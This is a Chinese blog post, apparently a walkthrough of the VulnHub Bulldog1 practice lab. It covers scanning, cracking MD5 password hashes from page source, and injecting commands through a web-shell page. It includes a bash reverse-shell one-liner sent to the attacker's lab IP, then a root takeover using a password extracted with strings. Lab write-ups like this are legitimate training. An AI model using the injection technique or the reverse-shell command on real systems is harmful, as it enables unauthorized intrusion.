vulnhub靶场,bulldog1

最新推荐文章于 2023-11-13 11:16:00 发布
最新推荐文章于 2023-11-13 11:16:00 发布
阅读量241 收藏 1
点赞数
分类专栏: 靶场实战 文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kukudeshuo/article/details/119654769
版权

vulnhub靶场,bulldog1

环境准备

靶机下载地址:https://www.vulnhub.com/entry/bulldog-1,211/
攻击机:kali(192.168.109.128)
靶机:bulldog1(192.168.109.157)
下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式

信息收集

使用arp-scan确定目标靶机

确定目标靶机IP为192.168.109.157
使用nmap扫描查看目标靶机端口开放情况

开放端口:23、80、8080
可以开到目标靶机将ssh端口换成了23
浏览器访问目标靶机80端口

翻译其中内容是说此网站已经被黑了,查看源代码也没有发现什么
点击Public Notice跳转到了另一个页面

查看源代码也没有发现什么
网站指纹识别

使用dirb进行网站目录结构扫描

先只观察一下一级目录,访问/admin网页

看来是Django的后台管理登录页面,使用暴力破解和SQL注入均无效
访问/dev网页

中间有个web-shell,点击试试

看来必须要登入后台才能进入这个页面,回到上个页面,翻译一下

这里说不确定黑客有没有留下什么痕迹,可能是在提醒我们,看看源代码里面有没有什么东西

果然在源代码里发现了一些加密后的数据,猜测使用了md5进行加密

渗透过程

将这个md5加密后的密文放到解密网站依次进行猜解







成功破解出两个密码,再根据源码前面的对应关系得到两个账号密码,分别是:nick:bulldog,sarah:bulldoglover
再次找到后台登录的地方,使用这两个账号试试能不能登录

可以看到nick用户成功登入后台
再次回到那个webshell的位置

看来这里应该是一个命令执行的位置,输出上面给的命令试试

确实是这样,那可以试着加管道符运行我们想运行的命令

可以看到,运行成功了,那现在就可以反弹shell了
kali终端:

靶机中:

ls&echo "bash -i >& /dev/tcp/192.168.109.128/4444 0>&1" | bash


可以看到kali这边成功反弹回来了一个shell

提权过程

查看用户的sudo权限

没有sudo权限,进入家目录

发现一个bulldogadmin文件,进去看看

又发现一个.hiddenadmindirectory文件
再进去看看

又发现了一个customPermissionApp文件,查看其内容

发现一堆乱码,用strings命令用来提取和显示非文本文件中的文本字符串

猜测可能是密码,应为SUPER、 ulitimate、PASSWORD、youCANTget, 可以把他们连到一起正好是SUPERultimatePASSWORDyouCANTget,H是来混淆的,中间刚好有PADDWORD
使用su命令切换为root用户

这里发现不能使用su命令,这里报的错误是必须要从终端运行,那使用python打开一个新的终端,使用sudo -i命令试试

可以看到成功切换为root用户,查看当前文件夹,成功获得flag,靶机bulldog1渗透结束

super 硕
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
VulnHub靶场-bulldog
hxync的博客
08-07 304
靶场下载地址:http://www.vulnhub.com/entry/bulldog-1,211/ 下载之后用VirtualBox打开即可。 搭建好靶场之后可以看到ip 用kali自带的火狐访问一下这个ip,没有发现什么有用的信息 用dirbuster扫一下 扫到的内容如下 访问admin发现后台登录页面 访问dev发现有一个web-shell链接 点击之后会提示需要认证 dev页面翻译一下,可以知道网站是用的Django,并且开启了ssh Rob...
Bulldog1
haha1314的博客
05-20 662
一、 收集信息 1、 扫描存活主机,找到目标机的ip 2、 扫描目标机的端口信息。 说明可以通过80或8080来访问它 3、 查看一些指纹信息 4、因为是自己搭的所以不需要被动收集 二、 web渗透 1、通过访问发现没有神什么可用信息,就两个页面,审查里面元素也没有可用信息。 2、 扫目录 扫出来目录不多,可以打开看看,也可以用自己的字典 多了一条 http://192.168.88...
Bulldog靶场记录
weixin_46411728的博客
09-18 861
bulldog靶场
VulnHub渗透测试实战靶场 - Bulldog: 1
LYJ20010728的博客
08-05 468
VulnHub渗透测试实战靶场 - Bulldog: 1环境下载Bulldog: 1靶机搭建渗透测试信息搜集漏洞挖掘getshell提权 环境下载 戳此进行环境下载 Bulldog: 1靶机搭建 具体步骤参考VirtualBox(Host only)和VMware共用同一虚拟网卡 将下载好的靶机环境,导入VritualBox,设置为Host-Only模式 将VMware中桥接模式网卡设置为VritualBox的Host-only 获取到IP地址为:192.168.56.101 渗透测试
Vulnhub靶场渗透练习(三) bulldog
weixin_30563917的博客
07-08 192
拿到靶场后先对ip进行扫描 获取ip 和端口 针对项目路径爆破 获取两个有用文件 http://192.168.18.144/dev/ dev,admin 更具dev 发现他们用到框架和语言 找到一个 shell 连接 http://192.168.18.144/dev/shell/ 反健源码 查看可以看到 丢入md5 网站解密 成功的解密2...
vuInhub靶场实战系列-bulldog-1
最新发布
06-03
vuInhub靶场实战系列-bulldog-1
BULLDOG-开源
05-27
Bulldog是WFMC兼容的开源,Apache样式许可的工作流解决方案,可在J2EE容器中运行。
bulldog_shop
05-09
自述文件 该自述文件通常会记录启动和运行应用程序所需的所有步骤。 您可能要讲的内容: Ruby版本 系统依赖 配置 数据库创建 数据库初始化 如何运行测试套件 服务(作业队列,缓存服务器,搜索引擎等) ...
British Bulldog Themes & New Tab-crx插件
03-16
安装扩展程序后,每次启动浏览器选项卡时,您将拥有一个新的British Bulldog。 我们的目标是为世界各地的人们带来出色的新标签。 让我们的团队为您提供新的屏幕标签,让您的生活栩栩如生。 每个新标签页都是真正的...
French Bulldog Themes & New Tab-crx插件
03-16
安装扩展程序后,每次启动浏览器选项卡时,您将拥有一个新的French Bulldog。 我们的目标是为世界各地的人们带来出色的新标签。 让我们的团队为您提供新的屏幕标签,让您的生活栩栩如生。 每个新标签页都是真正的...
Vulnhub靶场渗透测试系列bulldog(命令注入和sudo提权)
qq_45722813的博客
11-15 2600
Vulnhub靶场渗透测试系列-bulldog 靶机地址:https://www.vulnhub.com/entry/bulldog-1%2C211/ 下载将其导入VMware,设置网络模式为NAT模式,开启靶机虚拟机 在kali攻击机使用命令nmap -Pn 192.168.172.1/24来获取靶机的IP地址 这里如果实在扫不出来靶机IP地址的话参考这篇文章来进行设置 https://blog.csdn.net/qq_45722813/article/details/121324686 得到靶机IP地
靶机实战-bulldog1
滕财然的博客
01-19 947
bulldog1-靶机实战靶机实战:bulldog11、主机发现2、扫描端口3、web渗透(80端口)4、提权 靶机实战:bulldog1 先要知道对方的IP是否存活,也就是主机发现 1、主机发现 netdiscover -i etho -r IP/网段 属于主动 -i 指定网卡 -r 指定网段 找到目标靶机IP:192.168.232.134 也可以用nmap -sn 扫,看自己心情。...
靶机渗透【bulldog
学信安技术 卫国家之门
11-04 4266
一. bulldog靶机安装 1. 下载bulldog 靶场地址:Bulldog - VulnHub (可自行下载) 百度网盘:bulldog 提取码:qrnf 2. 将下载好的靶机存放在想存放的地方,建议放在其他虚拟机相同的目录下 3. 打开VMware,左上角文件 - - 打开 - - 找到存放bulldog的位置 4. 开启bulldog(开启后无需进行其他操作) 二. bulldog靶机渗透 设备信息: kali(NAT)IP:192.168.110.140 bulldog(NAT)IP:
[渗透测试靶机10] vulnhub靶场 BULLDOG_ 1
weixin_47112073的博客
11-13 225
这个靶机难度较为简单,可以简单练手
Bulldog-1 渗透测试
Darklord.W
04-09 376
一\开启bulldog虚拟机,并打开KALI,进行netdiscover扫描 netdiscover -i eth0 -r 192.168.8.0/24 可以看到,192.168.8.133为目标主机 2\进行masscan扫描 3\进行nmap扫描,端口,服务,版本,系统等 4\可以看见开放了23,80,8080端口,服务为ssh以及web服务 先手工测试ssh服务,s...
【甄选靶场Vulnhub百个项目渗透——项目四十五:bulldog-1(waf绕过)
人间体佐菲的博客
10-21 629
【甄选靶场Vulnhub百个项目渗透——45、项目四十五:bulldog-1(waf绕过)
bulldog-1靶机 write up 源码 MD5解密得到密码到后台 命令执行&&绕过 反弹shell string分析文件得到密码提权
YouthBelief的博客
11-30 1962
bulldog-1靶机 write up0x00 环境搭建0x01 信息收集0x02 漏洞挖掘web漏洞思路ssh 利用思路步骤1:浏览网页 爆破目录步骤二: 破解hash步骤三:利用密码登录后台步骤四:利用命令执行(需要尝试绕过方法)步骤五:反弹shell0x03 提升权限步骤六:查看系统用户,确定需要关注的用户步骤七:查找每个用户的文件步骤八:拼接root密码提权0x04 思路总结 0x00 环境搭建 下载链接 https://download.vulnhub.com/bulldog/bulld
(Vulnhub练习)--Bulldog1渗透实战
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
09-18 324
Bulldog1渗透实战 文章转载 靶机渗透测试实战(三)——Bulldog1渗透实战 Bulldog1渗透实战 扫描不到bulldog主机ip ​ 【1】从新启动bulldog,到开机页面选择第二个Ubuntu的高级选项。 ​ 【2】进入高级选项,再次选择第二个Linux内核版本的恢复模式回车。 选择root一行回车,进入命令行模式。 vim /etc/network/interfaces ,修改网卡名称成步骤查询的结果,保存。 auto ens33 iface ens33 inet dhcp reb
靶机渗透(二)bulldog1
qq_42180996的博客
04-26 1604
靶机bulldog1 一、实验环境 二、实验步骤 (一)信息收集 1.查询测试机IP地址,判断所处网段 2.主机发现(netdiscover) 3.端口扫描(masscan/namp) (二)http服务(80/8080端口) 1.靶机开启apache服务,尝试web渗透 2.网站指纹信息扫描(whatweb) 3.目录扫描(dirb) 4.查看/admin页面 5....
实现一个双向适配器实例,使得猫(Cat)可以学狗(Dog)叫,狗可以学猫抓老鼠。绘制相应类图并使用代码编程模拟。
04-01
以下是双向适配器类图和实现代码: ![adapter-pattern](https://user-images.githubusercontent.com/45758449/116464798-0e07c280-a89d-11eb-8b3e-7c3a88b9c7d9.png) ```python # Target interface class Cat: def catch_mice(self) -> str: pass # Adaptee interface class Dog: def bark(self) -> str: pass # Adaptee class Bulldog(Dog): def bark(self) -> str: return "Woof! Woof!" # Adapter class DogAdapter(Cat): def __init__(self, dog: Dog): self.dog = dog def catch_mice(self) -> str: return self.dog.bark() # Client code if __name__ == "__main__": bulldog = Bulldog() cat = Cat() adapter = DogAdapter(bulldog) print(adapter.catch_mice()) # Output: Woof! Woof! ``` 在上面的代码中,我们有一个Target接口 `Cat`,它定义了一个`catch_mice()`方法,表示猫抓老鼠。我们还有一个Adaptee接口`Dog`,它定义了一个`bark()`方法,表示狗叫。`Bulldog`是`Dog`接口的一个具体实现。 现在我们需要一个适配器类`DogAdapter`来使得猫可以学狗叫。它实现了`Cat`接口,并将`Dog`对象作为适配器构造函数的参数。在`catch_mice()`方法中,它调用`Dog`对象的`bark()`方法来模拟狗叫声。 在客户端代码中,我们创建了一个`Bulldog`对象和一个`Cat`对象。然后我们创建了一个`DogAdapter`对象,并将`Bulldog`对象传递给它。最后,我们通过适配器对象调用`catch_mice()`方法,并输出适配的结果。 这就是双向适配器模式的一个简单实现。当然,你可以根据自己的需求和场景来进行改进和扩展。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

super 硕

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值